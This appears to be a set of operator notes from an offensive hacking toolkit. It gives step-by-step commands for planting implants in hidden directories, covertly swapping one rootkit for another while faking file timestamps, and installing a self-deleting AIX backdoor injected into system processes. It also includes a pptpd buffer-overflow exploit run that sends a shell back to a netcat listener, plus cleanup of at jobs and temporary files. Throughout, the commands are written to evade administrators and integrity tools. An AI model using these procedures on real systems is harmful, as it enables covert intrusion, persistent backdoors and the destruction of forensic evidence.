erf.tar -cd IMPLANT_HIDDEN_DIRECTORY/erf -ls -R ## put up applicable parser(s) -put /current/up/skimcountry.v1.2.SunOS5.9.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/crond -put /current/up/cursehappy4 IMPLANT_HIDDEN_DIRECTORY/erf/crond -put /current/up/orleansstride.v2.3.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/crond -put /current/up/cursemagic.v1.0.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/crond -put /current/up/cursegismo.v1.1.0.4.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/crond ## encrypted CURSEHAPPY definition file -put /current/up/cursedefs/PROJECTNAME.enc IMPLANT_HIDDEN_DIRECTORY/erf/cd ## put up enemyrun -put /current/up/enemyrun.v2.3.1.3.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/nscd ## if everything looks good remove tar -rm IMPLANT_HIDDEN_DIRECTORY/erf.tar ## ## to continue the setup process go to the COLLECT section item titled: ## "edit ER configuration files" ## ### ### END File user.tool.enemyrun.COMMON ### (see also ../etc/user.tool.enemyrun.COMMON) ### ### BEGIN File user.tool.linux_remove_in_install_ss.COMMON (see also ../etc/user.tool.linux_remove_in_install_ss.COMMON) ### ### Upgrading a Linux Incision to a Stoicsurgeon ### Step 1: Trigger Incision or -elevate ### Step 2: Save timestamps of affected files/directories stat -t /dev /sbin /sbin/init /dev/ttyi* >L:/current/down/beforetimes ### Step 3: Upload dittlelight -put /current/up/hidelite.linux h ### Step 4: Need a nopen callback window to use dittlelight (will not ### work on any pids with parents that aren't 1, and callback ### windows do that) -nrtun PORT -call REDIR_IP:PORT ### Step 5: In the callback window, get your PID (and make sure the ### PPID is 1 -pid ### Step 6: Unhide your callback window ./h -u -p CALLBACK_PID ### Step 7: Make sure you are unhidden by comparing process listings ### and directory listings, and there should be differences ps -ef | grep sendmail -lt /dev/ttyi* ### Step 8: In unhidden window, trigger Incision self-destruct touch /dev/ttyia3 ### Step 9: Repeat step 7, except now instead of being different, ### the two windows should now be the same because Incision ### is gone, so everything is unhidden ps -ef | grep sendmail -lt /dev/ttyi* ### Step 10: Remove file we touched/"created" -rm /dev/ttyia3 ### Step 11: At this point, follow the "user.tool.stoicsurgeon" ### script in /current/etc to install Stoicsurgeon ### Step 12: Once Stoicsurgeon is installed, restore timestamps ### for the files/dirs affected by the Incision uninstall ### These are saved in "/current/down/beforetimes" from Step 2 ### NOTE: If "-ctrl" does not work, upload and run the standalone ### "Ctrl" program, computing the SEED variable as described ### in the "user.tool.stoicsurgeon" script if needed, or ### you can trigger and not need the SEED -ctrl -s /sbin/init ATIME 0 MTIME 0 CTIME 0 -ctrl -s /sbin ATIME 0 MTIME 0 CTIME 0 -ctrl -s /dev ATIME 0 MTIME 0 CTIME 0 ### Step 13: Confirm timestamps are restored ### This is a bit tricky to see that everything is right, so ### confirm that: ### 1. everything for /sbin should match (i.e. no diff line) ### 2. there should be no /dev/ttyia* files in aftertimes ### 3. /dev may not match exactly if there were changes, but ### /dev can change a lot so not a huge deal ### 4. the timestamps for /sbin/init should be the same in ### beforetimes and aftertimes ### 5. the inode field (8th field in stat output) from ### /dev/ttyia1 in beforetimes should match inode field ### from /sbin/init in aftertimes stat -t /dev /sbin /sbin/init /dev/ttyi* >L:/current/down/aftertimes -lsh diff /current/down/beforetimes /current/down/aftertimes ### All done!$###$ ### ### END File user.tool.linux_remove_in_install_ss.COMMON ### (see also ../etc/user.tool.linux_remove_in_install_ss.COMMON) ### ### BEGIN File user.tool.slyheretic.COMMON (see also ../etc/user.tool.slyheretic.COMMON) ### ######################################################### # SLYHERETIC v1.0.5.0 ######################################################### ### SLYHERETIC is a light-weight implant for AIX 5.1 and AIX 5.2 Uses Hide-in-Plain-Sight techniques to provide stealth. ### SlyHeretic_Persistent: This installer injects a backdoor into a system process and persists across system reboots. ### SlyHeretic_OneShot: This installer injects a backdoor into a system process and does not persist across system reboots. ### All SLYHERETIC binaries delete themselves upon execution. **IMPORTANT: SINCE SLYHERETIC Uses Hide-in-Plain-Sight techniques to provide stealth ensure that you get off of box if known administrators are on the box.** **IMPORTANT: Do not install SLYHERETIC on systems where TripWire is installed. *********************************** ######################################################### Persistent Install###################################################################### ## To install the Persistent version of SLYHERETIC perform the following steps. ## Upload the SlyHeretic_Persistent binary to the target with the name 'date' on a filesystem that's not mounted noexec. -put /current/up/SlyHeretic_Persistent date ### Execute the installer with the following command: PATH=. date ## Check the installer error code by looking at the 'date' string reported. The installer will report a 'date' string with the ## seconds field as the error code. If the seconds field reports '00', the installation was successful. If you get an error code in the seconds field start the troubleshooting. The most common error that you might receive is the '09' error. This error means that no viable injection process is available at that particuliar time installation time. SLYHERETIC checks the process state prior to injecting so it may determine that no process are good candiates for injection. Wait a minute and try the install again. If that does not work contact tool champion or developer. ########################################################## OneShot Install########################################################################## ## Upload the SlyHeretic_OneShot binary to the target with the name 'date' on a filesystem that's not mounted noexec. -put /current/up/SlyHeretic_OneShot date ### Execute the installer with the following command: PATH=. date ## Check the installer error code by looking at the 'date' string reported. The installer will report a 'date' string with the ## seconds field as the error code. If the seconds field reports '00', the installation was successful. If you get an error code in the seconds field start the troubleshooting. The most common error that you might receive is the '09' error. This error means that no viable injection process is available at that particuliar time installation time. SLYHERETIC checks the process state prior to injecting so it may determine that no process are good candiates for injection. Wait a minute and try the install again. If that does not work contact tool champion or developer. #############################################################Uninstalling SLYHERETIC###################################################################### ## Upload the SlyHeretic_Uninstaller binary to the target with the name 'date' on a filesystem that's not mounted noexec. -put /current/up/SlyHeretic_Uninstaller date ### Execute the installer with the following command: PATH=. date The Uninstaller will not provide any out stating that the uninstall was successful. To verify uninstall you can attempt to trigger via tipoff or -irtun. #########################################################SLYHERETIC REINSTALL############################################################################ SLYHERETIC can be reinstalled on a system but only after an Uninstall has taken place. A reinstall is simply the following steps: Uninstall SLYHERETIC Install SLYHERETIC ######################################################### TRIGGERING SLYHERETIC ######################################################################### ## Trigger SLYHERETIC and upload NOPEN with redirection. -irtun TARGET_IP RANDOM_PORT -ueY5 ********SLYHERETIC uses DewDrop 3.X trigger********************************** ### ### END File user.tool.slyheretic.COMMON ### (see also ../etc/user.tool.slyheretic.COMMON) ### ### BEGIN File user.tool.entrymanor.COMMON (see also ../etc/user.tool.entrymanor.COMMON) ### ################################################### ### ENTRYMANOR entrymanor binary: xp_pptpd ################################################### 2008-01-15 08:15:21 EST Usage: ./xp_pptpd -i -p -l -r -i target -p port -l local IP -r local port -v verify server -t timeout in seconds -s stack location -h help -d debug Check: ./xp_pptpd -i 127.0.0.1 -p 1723 -v Then: nc -vv -l -p 5492 ./xp_pptpd -i 127.0.0.1 -p 1723 -l 555.1.2.22 -r 5492 0. will fail on pptpd versions greater than 1.1.4-b3 and 1.1.3-20030409. 1. Determine if the configuration of the target is exploitable by using the -v option. ./xp_pptpd -i 127.0.0.1 -p 1723 -v 2. (In Window 1, type the following command) # nc -vv -l -p 5492 listening on [any] 5492 ... (after several seconds or minutes) ... 555.1.2.171: inverse host lookup failed: Unknown host connect to [555.1.2.22] from (UNKNOWN) [555.1.2.171] 1047 (In Window 2, type the following command (use shell if running on linux pitch)) # ./xp_pptpd -i 555.1.2.171 -p 1723 -l 555.1.2.22 -r 5492 Bruteforcing against 555.1.2.171 interrupt when you get a shell to 555.1.2.22 on port 5492... * connecting... [ret=0xbfffff00]..sending done * connecting... [ret=0xbffffece]..sending done * connecting... [ret=0xbffffe9c]..sending done * connecting... [ret=0xbffffe6a]..sending done * connecting... [ret=0xbffffe38]..sending done * connecting... [ret=0xbffffe06]..sending done ... * connecting... [ret=0xbffff82a]..sending done * connecting... [ret=0xbffff7f8]..sending done * connecting... [ret=0xbffff7c6]..sending done (Hit c when you get a connection back in netcat.) ### ### END File user.tool.entrymanor.COMMON ### (see also ../etc/user.tool.entrymanor.COMMON) #### BAIL -cd /tmp/socket-root -cd .. -ls rm -rf /tmp/socket-root -ls #### AT JOB (CAREFUL! These can log.) at -l at -r ATJOB at -l -burn #### PITCHIMPAIR-LINUX #### some.target.ip #### 1.2.3.4 #### /tmp/socket-root